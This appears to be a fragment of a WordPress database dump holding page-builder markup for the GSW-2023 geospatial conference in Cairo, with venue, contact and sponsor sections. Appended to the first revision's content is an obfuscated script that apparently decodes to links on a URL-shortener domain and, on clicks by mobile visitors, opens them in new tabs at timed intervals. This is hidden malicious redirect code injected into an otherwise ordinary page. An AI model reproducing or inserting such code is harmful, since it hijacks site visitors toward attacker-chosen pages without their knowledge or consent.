main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-01 08:02:32','2023-06-01 08:02:32','',3066,'https://gsw2023.com/?p=4594',0,'revision','',0),
(4595,1,'2023-06-01 08:02:50','2023-06-01 08:02:50','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685606518529{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://vint.sa/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button 